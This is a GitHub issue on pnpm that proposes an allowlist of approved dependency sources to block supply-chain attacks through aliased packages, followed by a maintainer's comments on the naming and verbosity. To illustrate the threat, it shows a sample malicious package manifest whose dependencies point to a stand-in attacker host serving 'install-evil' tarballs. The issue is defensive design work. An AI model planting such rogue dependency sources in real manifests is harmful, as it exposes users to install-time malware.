Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Allowlist of unusual dependency resolutions #5612

Open
1 task done
Jack-Works opened this issue Nov 10, 2022 · 1 comment
Open
1 task done

Allowlist of unusual dependency resolutions #5612

Jack-Works opened this issue Nov 10, 2022 · 1 comment
Labels
type: feature

Comments

@Jack-Works
Copy link
Member

Describe the user story

In #4001 we discussed the possibility of evil packages using the npm alias to bypass the onlyBuiltDependencies limitation. Currently, we're using a .pnpmfile to manually implement the allow list.

Describe the solution you'd like

A new field in package.json/pnpm called approvedUnusualResolution

"pnpm": {
    "approvedUnusualResolution": {
        "wyvern-js": [
            "git+https://github.com/ProjectOpenSea/wyvern-js.git#v3.2.1",
            "github:ProjectOpenSea/wyvern-js#semver:^3.2.1"
        ]
    },
    "onlyBuiltDependencies": ["another-package-that-requires-install-script"]
}

Then if a dependency looks-normal-but-evil tries to declare the dependency as:

"dependency": {
    "wyvern-js": "https://my-evil-npm-package.com/wyvern-js.tar.gz",
    "another-package-that-requires-install-script": "https://my-evil-npm-package.com/install-evil.tar.gz"
}

pnpm will fail with the following message and it will not try to install/execute lifecycle scripts.

Cannot install "looks-normal-but-evil@0.0.1":

    It depends on "wyvern-js", but using an unapproved source "https://my-evil-npm-package.com/wyvern-js.tar.gz"
    It depends on "another-package-that-requires-install-script", but using an unapproved source "https://my-evil-npm-package.com/install-evil.tar.gz"

Describe the drawbacks of your solution

Describe alternatives you've considered
@zkochan
Copy link
Member

zkochan commented Nov 14, 2022

I think approvedUnusualResolution is not a good name. Why are they are unusual? They are just one of the supported sources.

Also, I don't understand why the package's alias is needed in this setting. Just the source should be enough:

"pnpm": {
    "approvedUnusualResolution": {
        "git+https://github.com/ProjectOpenSea/wyvern-js.git#v3.2.1",
        "github:ProjectOpenSea/wyvern-js#semver:^3.2.1"
    },
    "onlyBuiltDependencies": ["another-package-that-requires-install-script"]
}

And it might be too verbose if the exact resolved specs will have to be listed. So when you update wyvern-js, you'll have to update this config.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
type: feature
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@zkochan @Jack-Works